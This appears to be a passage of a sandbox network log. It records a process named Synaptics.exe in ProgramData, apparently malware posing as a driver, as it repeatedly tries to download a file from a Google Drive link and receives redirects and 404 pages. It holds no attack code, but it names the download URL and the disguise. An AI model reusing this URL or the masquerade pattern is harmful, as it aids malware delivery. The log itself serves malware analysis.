                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:35 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7K-XWNDgyCCBzgYXuk8c8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        100192.168.2.750128142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7fI9Y1fM-Z4_V2C6mkWRbnWPDz9pi3vcBftr46m-A4dwB9cjIzT1kUt9BHzyihhGCISH70x2o
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-6Tie74mkdyyaZKr5qjkeGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 37 6d 49 4b 48 36 31 6f 71 2d 79 39 75 6a 46 47 32 4e 6c 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="k7mIKH61oq-y9ujFG2NlSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        101192.168.2.750127142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QU0rz-f909hCqG9FiqpYRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        102192.168.2.750130142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-exCDov0P0hFElMN2zq1Nvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        103192.168.2.750129142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC54KiVpcBu2nY65JLIaFtSEo6_qKzKFnfwMGWpZeZtP6dDcTNlU6k5W4-D70jCtlbz37ge_Eas
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-l5sNE6-RkMlz5NugYVCoTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 56 69 43 53 39 68 72 52 50 4a 4d 6b 71 65 32 6d 73 5a 47 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="PViCS9hrRPJMkqe2msZGNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        104192.168.2.750133142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:36 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7tFm43SHQ8M_hkHIYNGOOkx9yROYvcLACVCTuKJlD5JTkymPyBpeH6z8Rzhb1RFr1kTBVgsUI
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:37 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Px0bYMPCmrCj2T7PnXR1Jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 4f 48 5f 56 59 66 5f 4e 56 53 62 34 41 37 42 72 36 6c 37 77 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="aOH_VYf_NVSb4A7Br6l7ww">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        105192.168.2.750132142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:36 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        106192.168.2.750134142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:37 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:37 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5YPc1ULt8QZ-Us8tJ_EIOQD20fJ2C6WMFqK58Gcy3JtlPGbuOb1jjVKUFMKlVynchR
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:37 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-edkOwu2j-iEUONHPmvuOiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
